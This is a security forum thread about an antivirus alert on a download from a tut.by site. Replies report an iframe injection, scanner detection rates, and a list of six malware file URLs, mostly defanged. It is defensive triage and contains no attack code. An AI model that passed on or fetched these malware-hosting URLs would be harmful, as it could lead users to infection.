AIS is blocking the file spx-dxf.exe on this page
hxxp://xaraxtv.at.tut.by/spx.htm
claiming it’s a trojan, but I think it’s a false positive?
Can Avast confirm this?
There seems to be something else going on at the time of the download of that one file that doesn’t happen with the other two, an iframe injection to reddii.org (see below), see image 1 of the decoded script file that is run when you click the spx-dxf.exe link.
http://www.mywot.com/en/scorecard/reddii.org and http://www.siteadvisor.com/sites/reddii.org/summary/
avast isn’t the only AV scanner to find that script file suspect 24 of 44 scanners (60%), see http://www.virustotal.com/analisis/1ebe1c0f91af0da6a6e73bc0c17b5eef3ecaededcc228f7feb9f62f3daf896a7-1278602534.
So there is if nothing else something strange happening with that download which isn’t happening with the other two.
Hi zenzor,
Please make the link to the site non-clickable by putting hxtp or wXw.
Enough malware coming from there:
Threats found: 6
Here is a complete list:
Threat Name: Packed.Generic.114
Location: htxp://ironfist.at.tut.by/ipasetup.exe
Threat Name: Backdoor.Trojan
Location: htxp://ironfist.at.tut.by/guiz.exe
Threat Name: Suspicious.MH690
Location: htxp://ironfist.at.tut.by/zeratssl.zip
Threat Name: Trojan Horse
Location: htxp://ironfist.at.tut.by/rssbot.zip
Threat Name: Packed.Generic.114
Location: htxp://ironfist.at.tut.by/iparus.exe
Threat Name: JS.Qsiframe
Location: htxp://xaraxtv1.at.tut.by/spx-dxf.exe
Last detection found supicious here: http://wepawet.iseclab.org/view.php?hash=9d2c42b038c610f57240def45c3c4a41&t=1278609680&type=js
See the VT report there: avst detects as HTML:IFrame-BN
polonus
P.S. also see: htxp://jsunpack.jeek.org/dec/go?report=852fb9a3aa290487ffb9fa4667ac6ac36451af9a
(Make clickable only for those that know what to do, have NS up and active in the browser)
Thanks for your replies. I’ve contacted the owner of the site, to get him to look into it. I’ll report back here when things have been cleared up.
thanks!
Rich
You’re welcome.